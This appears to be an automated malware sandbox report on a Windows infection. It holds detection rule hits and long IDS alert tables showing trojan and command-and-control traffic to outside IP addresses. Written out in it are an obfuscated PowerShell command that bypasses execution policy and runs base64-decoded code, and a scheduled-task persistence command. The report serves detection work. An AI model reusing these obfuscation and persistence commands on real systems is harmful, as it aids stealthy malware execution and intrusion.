Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'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'+[cHaR]0X22+'))')))", CommandLine: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'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
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3580, TargetFilename: C:\Users\user\AppData\Local\Temp\zedpap0h.oz0.ps1

Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'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'+[cHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3580, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline", ProcessId: 3792, ProcessName: csc.exe

Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\caspol.exe", ParentImage: C:\Users\user\AppData\Roaming\caspol.exe, ParentProcessId: 3888, ParentProcessName: caspol.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp", ProcessId: 4056, ProcessName: schtasks.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-20T07:56:32.963009+0100 | 2024197 | 1 | A Network Trojan was detected | 192.3.243.136 | 80 | 192.168.2.22 | 49164 | TCP
2024-11-20T07:56:35.880037+0100 | 2024197 | 1 | A Network Trojan was detected | 192.3.243.136 | 80 | 192.168.2.22 | 49166 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-20T07:56:32.963004+0100 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49164 | 192.3.243.136 | 80 | TCP
2024-11-20T07:56:35.880012+0100 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49166 | 192.3.243.136 | 80 | TCP
2024-11-20T07:57:11.112717+0100 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49184 | 192.3.243.136 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-20T07:56:57.988472+0100 | 2024312 | 1 | A Network Trojan was detected | 192.168.2.22 | 49168 | 94.156.177.41 | 80 | TCP
2024-11-20T07:56:59.882200+0100 | 2024312 | 1 | A Network Trojan was detected | 192.168.2.22 | 49169 | 94.156.177.41 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-20T07:56:57.248279+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49168 | 94.156.177.41 | 80 | TCP
2024-11-20T07:56:59.162067+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49169 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:00.038068+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49170 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:00.985981+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49171 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:01.990103+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49172 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:03.028263+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49173 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:04.458084+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49174 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:05.513581+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49176 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:07.053237+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49177 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:08.400152+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49178 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:09.288353+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49182 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:10.533829+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49183 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:11.427592+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49185 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:12.359101+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49186 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:13.469417+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49187 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:14.821226+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49188 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:15.719445+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49189 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:16.626398+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49190 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:17.507138+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49191 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:18.365734+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49192 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:19.253733+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49193 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:20.473746+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49194 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:21.599286+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49195 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:25.465376+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49196 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:26.474558+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49197 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:27.353742+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49198 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:28.253668+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49199 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:29.125788+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49200 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:30.114920+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49201 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:30.992768+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49202 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:32.063042+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49203 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:32.925555+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49204 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:33.906030+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49205 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:34.787024+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49206 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:35.655030+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49207 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:36.530041+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49208 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:37.385969+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49209 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:38.245541+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49210 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:39.100304+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49211 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:40.099524+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49212 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:40.957522+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49213 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:41.834157+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49214 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:42.690842+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49215 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:43.687015+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49216 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:44.686743+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49217 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:45.683162+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49218 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:46.572052+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49219 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:47.625431+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49220 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:48.537909+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49221 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:49.537253+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49222 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:50.541403+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49223 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:51.550185+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49224 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:52.571474+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49225 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:53.565464+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49226 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:54.459148+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49227 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:55.316399+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49228 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:56.191793+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49229 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:57.056887+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49230 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:58.063832+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49231 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:59.315019+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49232 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:00.406324+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49233 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:01.402550+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49234 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:02.410939+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49235 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:03.281828+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49236 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:04.153651+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49237 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:05.170720+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49238 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:06.042036+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49239 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:07.032370+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49240 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:08.079653+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49241 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:09.075720+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49242 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:09.961207+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49243 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:10.842151+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49244 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:11.848537+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49245 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:12.738339+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49246 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:13.595288+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49247 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:14.448889+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49248 | 94.156.177.41 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-20T07:57:00.801702+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49170 | TCP
2024-11-20T07:57:01.717775+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49171 | TCP
2024-11-20T07:57:02.767336+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49172 | TCP
2024-11-20T07:57:03.841307+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49173 | TCP
2024-11-20T07:57:05.315581+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49174 | TCP
2024-11-20T07:57:06.379522+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49176 | TCP
2024-11-20T07:57:07.939075+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49177 | TCP
2024-11-20T07:57:09.113229+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49178 | TCP
2024-11-20T07:57:10.040363+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49182 | TCP
2024-11-20T07:57:11.268041+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49183 | TCP
2024-11-20T07:57:12.160366+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49185 | TCP
2024-11-20T07:57:13.070076+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49186 | TCP
2024-11-20T07:57:14.198397+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49187 | TCP
2024-11-20T07:57:15.544258+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49188 | TCP
2024-11-20T07:57:16.460615+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49189 | TCP
2024-11-20T07:57:17.352340+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49190 | TCP
2024-11-20T07:57:18.222070+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49191 | TCP
2024-11-20T07:57:19.101205+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49192 | TCP
2024-11-20T07:57:20.097314+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49193 | TCP
2024-11-20T07:57:21.197086+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49194 | TCP
2024-11-20T07:57:25.327626+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49195 | TCP
2024-11-20T07:57:26.330544+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49196 | TCP
2024-11-20T07:57:27.212143+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49197 | TCP
2024-11-20T07:57:28.073862+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49198 | TCP
2024-11-20T07:57:28.982464+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49199 | TCP
2024-11-20T07:57:29.979437+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49200 | TCP
2024-11-20T07:57:30.843035+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49201 | TCP
2024-11-20T07:57:31.716016+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49202 | TCP
2024-11-20T07:57:32.789112+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49203 | TCP
2024-11-20T07:57:33.773092+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49204 | TCP
2024-11-20T07:57:34.643251+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49205 | TCP
2024-11-20T07:57:35.511423+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49206 | TCP
2024-11-20T07:57:36.389874+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49207 | TCP
2024-11-20T07:57:37.249204+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49208 | TCP
2024-11-20T07:57:38.100844+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49209 | TCP
2024-11-20T07:57:38.960823+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49210 | TCP
2024-11-20T07:57:39.959250+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49211 | TCP
2024-11-20T07:57:40.821148+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49212 | TCP
2024-11-20T07:57:41.680888+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49213 | TCP
2024-11-20T07:57:42.548514+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49214 | TCP
2024-11-20T07:57:43.550061+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49215 | TCP
2024-11-20T07:57:44.546679+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49216 | TCP
2024-11-20T07:57:45.538504+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49217 | TCP
2024-11-20T07:57:46.397054+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49218 | TCP
2024-11-20T07:57:47.440139+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49219 | TCP
2024-11-20T07:57:48.355331+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49220 | TCP
2024-11-20T07:57:49.392166+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49221 | TCP
2024-11-20T07:57:50.401732+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49222 | TCP
2024-11-20T07:57:51.405120+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49223 | TCP
2024-11-20T07:57:52.419599+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49224 | TCP
2024-11-20T07:57:53.417983+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49225 | TCP
2024-11-20T07:57:54.302370+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49226 | TCP
2024-11-20T07:57:55.168793+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49227 | TCP
2024-11-20T07:57:56.042606+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49228 | TCP
2024-11-20T07:57:56.917175+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49229 | TCP
2024-11-20T07:57:57.919026+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49230 | TCP
2024-11-20T07:57:58.925815+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49231 | TCP
2024-11-20T07:58:00.184000+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49232 | TCP
2024-11-20T07:58:01.254920+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49233 | TCP
2024-11-20T07:58:02.257306+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49234 | TCP
2024-11-20T07:58:03.147969+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49235 | TCP
2024-11-20T07:58:04.017516+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49236 | TCP
2024-11-20T07:58:05.020538+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49237 | TCP
2024-11-20T07:58:05.893320+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49238 | TCP
2024-11-20T07:58:06.884043+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49239 | TCP
2024-11-20T07:58:07.913735+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49240 | TCP
2024-11-20T07:58:08.919532+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49241 | TCP
2024-11-20T07:58:09.795871+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49242 | TCP
2024-11-20T07:58:10.695527+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49243 | TCP
2024-11-20T07:58:11.692160+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49244 | TCP
2024-11-20T07:58:12.566542+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49245 | TCP
2024-11-20T07:58:13.446885+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49246 | TCP
2024-11-20T07:58:14.318123+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49247 | TCP
2024-11-20T07:58:15.165411+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.22 | 49248 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-20T07:57:00.796820+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49170 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:01.712250+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49171 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:02.731919+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49172 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:03.741633+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49173 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:05.310719+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49174 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:06.374526+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49176 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:07.917653+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49177 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:09.108399+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49178 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:10.035512+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49182 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:11.261515+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49183 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:12.155460+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49185 | 94.156.177.41 | 80 | TCP
